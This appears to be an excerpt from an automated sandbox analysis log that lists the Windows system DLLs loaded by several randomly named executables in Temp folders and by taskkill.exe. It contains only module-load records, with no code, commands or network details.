Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
